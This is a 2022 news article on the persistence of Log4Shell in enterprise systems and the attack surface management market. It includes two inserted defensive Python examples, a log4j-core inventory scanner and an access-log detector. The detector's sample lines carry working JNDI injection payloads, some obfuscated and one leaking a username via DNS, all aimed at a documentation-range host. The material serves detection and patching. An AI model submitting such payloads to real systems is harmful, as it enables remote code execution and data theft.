Many orgs are still failing to address Log4j — here’s why 

August 9, 2022


Out of all the vulnerabilities disclosed over the past few years, one stands out from the crowd: Log4j. When the flaw (CVE-2021-44228, better known as Log4Shell) was disclosed in December 2021 after researchers found a remote code execution vulnerability in the Apache Log4j 2 logging library, it became clear that billions of devices running Java applications that embed the library were at risk. 

While much of the uproar over Log4j has died down, many organizations are still struggling to eradicate the vulnerability completely. 

New research released by attack surface management provider Cycognito found that 70% of firms that had previously addressed Log4j in their attack surface are still struggling to patch vulnerable assets and to prevent new instances of Log4j from resurfacing in their IT stack. 

In fact, some firms are seeing their exposure to Log4j increase: 21% of organizations with vulnerable assets reported triple-digit percentage growth in the number of exposed Log4j-vulnerable assets in July compared with January. 

Above all, the findings indicate that the Log4j debacle is far from over, and will continue to haunt organizations that aren’t prepared to proactively manage their attack surface and patch exposed systems. 

Is Log4j still a threat? 

Around a month ago, the U.S. Cyber Safety Review Board's report renewed interest in Log4j and attempted to dissect the vulnerability's true long-term impact.  

One of the key findings of the report was that Log4j is an “endemic vulnerability” that “remains deeply embedded in systems.”


The authors suggested that one of the key problems is that security teams are often unable to identify where vulnerable software lives within the environment. 

For Allie Mellen, senior security operations analyst at Forrester, the difficulty of mitigating Log4j comes down to companies lacking a comprehensive software inventory.

“Without an accurate inventory of where the function is used, it can be very challenging to track down every single application in which it is used across the enterprise,” Mellen said. 

Once an organization has a software inventory, it can start working toward patching vulnerable systems. With Log4Shell rated at the maximum CVSS score of 10.0, it should be a top priority for security teams.  

“CISOs should work with application security teams, risk management teams, and cross-functionality with IT and development teams to prioritize patching Log4j,” she said. “There are a lot of competing priorities for these teams, but Log4j needs to be at the top of the list given the effects it is having on the ecosystem.”
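The inventory step Mellen describes is mostly a matter of finding every copy of log4j-core, including the ones buried inside WAR and EAR files. The Python below is an added example, not code from the article or from Cycognito: it walks a directory tree, opens every archive, looks into nested archives, reads the log4j-core version from the Maven pom.properties that the artifact ships, and maps that version to the worst CVE still unfixed using Apache's published fix versions for the 2.x line and the 2.12.x (Java 7) and 2.3.x (Java 6) backports. It also records whether the JndiLookup class is still present, since removing it was the documented stop-gap mitigation. The directory layout, file names and version strings in demo() are constructed fixtures; shaded JARs that drop the Maven metadata and Log4j 1.x are not detected.

```python
"""Find log4j-core copies on disk and report the worst unpatched CVE per copy.
Added example; assumes Maven-packaged log4j-core 2.x (pom.properties present)."""
import io
import re
import tempfile
import zipfile
from pathlib import Path

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparseable."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(x or 0) for x in m.groups()) if m else None


def worst_cve(version):
    """Most serious CVE still unfixed in this log4j-core 2.x version, or None."""
    major, minor, _ = version
    if major != 2:
        return None  # 1.x is end-of-life with different issues; not handled here
    if minor == 3:      # Java 6 backport line
        fixes = [((2, 3, 1), "CVE-2021-44228"), ((2, 3, 2), "CVE-2021-44832")]
    elif minor == 12:   # Java 7 backport line
        fixes = [((2, 12, 2), "CVE-2021-44228"), ((2, 12, 3), "CVE-2021-45105"),
                 ((2, 12, 4), "CVE-2021-44832")]
    else:               # main line
        fixes = [((2, 15, 0), "CVE-2021-44228"), ((2, 16, 0), "CVE-2021-45046"),
                 ((2, 17, 0), "CVE-2021-45105"), ((2, 17, 1), "CVE-2021-44832")]
    for fixed_in, cve in fixes:
        if version < fixed_in:
            return cve
    return None


def inspect_archive(data, label, depth=0, findings=None):
    """Record any log4j-core inside this archive (bytes) and its nested archives."""
    findings = [] if findings is None else findings
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not a zip after all (corrupt file, wrong extension)
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            raw = next((ln.partition("=")[2].strip() for ln in props.splitlines()
                        if ln.startswith("version=")), "")
            version = parse_version(raw)
            findings.append({
                "archive": label,
                "version": raw,
                "cve": worst_cve(version) if version else "unknown",
                # A removed JndiLookup class is the documented mitigation for
                # CVE-2021-44228/-45046 where an upgrade is not possible.
                "jndi_lookup_present": JNDI_LOOKUP_CLASS in names,
            })
        if depth < 2:  # fat JARs and WARs: look into nested archives too
            for name in names:
                if name.lower().endswith(ARCHIVE_SUFFIXES):
                    inspect_archive(zf.read(name), f"{label}!{name}", depth + 1, findings)
    return findings


def scan_tree(root):
    """Walk a directory and return one finding per log4j-core copy discovered."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            inspect_archive(path.read_bytes(), str(path), findings=findings)
    return findings


def build_sample_jar(version, include_jndi=True):
    """Constructed fixture: a minimal archive that looks like log4j-core."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                               f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # stand-in bytes
    return buf.getvalue()


def demo():
    """Constructed scenario: an old copy, a patched copy, and one hidden in a WAR."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "legacy").mkdir()
        (root / "legacy" / "log4j-core-2.14.1.jar").write_bytes(build_sample_jar("2.14.1"))
        (root / "log4j-core-2.17.1.jar").write_bytes(build_sample_jar("2.17.1"))
        war = io.BytesIO()
        with zipfile.ZipFile(war, "w") as zf:  # 2.15.0 with JndiLookup stripped out
            zf.writestr("WEB-INF/lib/log4j-core.jar", build_sample_jar("2.15.0", False))
        (root / "app.war").write_bytes(war.getvalue())
        return sorted((f["version"], f["cve"], f["jndi_lookup_present"])
                      for f in scan_tree(root))


if __name__ == "__main__":
    for version, cve, jndi in demo():
        print(f"log4j-core {version}: {cve or 'patched'}, JndiLookup present={jndi}")
```

Run it against a real host with scan_tree("/opt") or similar; anything reported with a CVE and JndiLookup still present is the priority list, and a copy that lives only inside a WAR is exactly the kind the article says keeps resurfacing when an old build is redeployed.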

While there are few public examples of breaches that resulted from Log4j, there are examples of significant damage. Criminals used the vulnerability to compromise the Vietnamese crypto trading platform ONUS, demanding a $5 million ransom and leaking the data of almost 2 million customers online. 

In any case, Log4j gives attackers an entry point into web applications and, through them, access to high-value personally identifiable information (PII) and other data. The flaw sits in Log4j 2's message lookup feature: any attacker-controlled string that ends up in a log message, such as an HTTP User-Agent header or a username, can carry a ${jndi:ldap://...} expression that a vulnerable version resolves by contacting the named server and loading what it returns, so exploitation requires nothing more than getting a string logged. 
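That entry point leaves traces in the web server's access log, where the payload usually arrives in a header or query parameter. The Python below is an added example, not from the article: it scans access-log lines for ${jndi:...} lookups, first undoing the obfuscations seen in the wild (URL encoding, ${lower:} and ${upper:} wrappers, and ${x:-default} fallbacks) in the inside-out order that Log4j's own lookup interpolation applies them, so a probe written as ${${lower:j}${upper:n}${::-d}${env:NaN:-i}:ldap://...} is caught alongside the plain form. The log lines, addresses and paths in SAMPLE_LOG are constructed; 203.0.113.0/24 is a documentation range.

```python
"""Flag Log4Shell probes in access logs, including obfuscated variants.
Added example; resolves lookups the way Log4j's Interpolator would, then
searches for the surviving ${jndi:...} expression."""
import re
import urllib.parse

INNER = re.compile(r"\$\{([^${}]*)\}")  # an innermost lookup, no nested braces
JNDI = re.compile(r"\$\{jndi:([a-z]+):/*([^/}\s\"]+)", re.IGNORECASE)

# Constructed access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:12:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:12:07 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:12:09 +0000] "GET /login?user='
    '%24%7Bjndi%3Armi%3A%2F%2F203.0.113.7%3A1099%2Fx%7D HTTP/1.1" 400 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:03:12:11 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}${upper:n}${::-d}${env:NaN:-i}:${lower:LDAP}://203.0.113.7:1389/b}"',
    '10.0.0.9 - - [10/Dec/2021:03:12:13 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:dns://203.0.113.7/${sys:user.name}}"',
]


def _resolve_one(body):
    """Collapse one innermost ${...} the way Log4j would, keeping jndi intact."""
    key = body.lower()
    if key.startswith("jndi:"):
        return "${" + body + "}"      # the payload itself: keep it for matching
    if key.startswith("lower:"):
        return body[6:].lower()
    if key.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                  # ${env:NOPE:-j}, ${::-j}: the fallback wins
        return body.split(":-", 1)[1]
    return "${" + body + "}"          # sys:, env:, date: etc. cannot be resolved offline


def normalize(raw, max_rounds=20):
    """URL-decode, then resolve nested lookups inside-out until nothing changes."""
    text = urllib.parse.unquote(raw)
    for _ in range(max_rounds):
        new = INNER.sub(lambda m: _resolve_one(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def find_log4shell_attempts(lines):
    """One hit per line that still carries a JNDI lookup after normalization."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = JNDI.search(normalize(line))
        if m:
            hits.append({
                "line": n,
                "scheme": m.group(1).lower(),      # ldap, ldaps, rmi, dns ...
                "target": m.group(2),              # host[:port] the victim would contact
                "obfuscated": "${jndi:" not in line.lower(),
            })
    return hits


if __name__ == "__main__":
    for hit in find_log4shell_attempts(SAMPLE_LOG):
        print(hit)
```

A hit is evidence of an attempt, not of compromise: the string may have been logged by a component that never passed it to a vulnerable Log4j, and the application may log fields the front-end server does not. Correlate hits with outbound LDAP, RMI or DNS connections from the application host to the recorded target to decide which ones matter.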

Rethinking attack surface management 

The key to identifying and patching Log4j-vulnerable systems is a scalable approach to attack surface management: the ability to discover exposures at scale and at the pace at which users add new apps and services to the environment. 


This is a task that legacy approaches to vulnerability management with limited automation are ill-equipped to address.

“Log4j is one of the worst [vulnerabilities] of the last few years, if not the last decade. Organizations are struggling to eradicate it, even when they have huge teams. Why? Because of the legacy input-based, unscalable approach,” said Rob Gurzeev, CEO of Cycognito. “That unscalable approach is a legacy mindset when it comes to external attack surface management, where scanning tools don’t scan often or deep enough into assets. Simply put, external attack surfaces are too vast and amorphous for status quo EASM [external attack surface management] solutions.”  

Gurzeev noted that the external attack surface is morphing constantly as organizations deploy new software-as-a-service (SaaS) applications, with Log4j not only impacting old systems but newly deployed ones as well. 

The attack surface management market 

One of the solution categories emerging to address vulnerability management of external-facing assets is attack surface management. 

Providers like Cycognito are working to address the challenges around attack surface management with solutions that can automatically scan the attack surface to provide security teams with more transparency over systems with vulnerabilities.

These solutions then provide security teams with threat intelligence they can use to identify the most vulnerable and at-risk assets. 

As more and more organizations seek scalable vulnerability management solutions, Frost & Sullivan estimates that the global vulnerability management market will reach a valuation of $2.51 billion by 2025. 

Over the past 12 months alone, security providers including Cycognito ($100 million), JupiterOne ($70 million), Bishop Fox ($75 million), Cyberpion ($27 million) and Censys ($35 million) have all closed significant funding rounds in attack surface management.


Other competitors in the market include Microsoft Defender External Attack Surface Management and Mandiant Advantage Attack Surface Management, which aim to help enhance a security team’s ability to identify vulnerabilities and misconfigurations that put enterprise data at risk.  
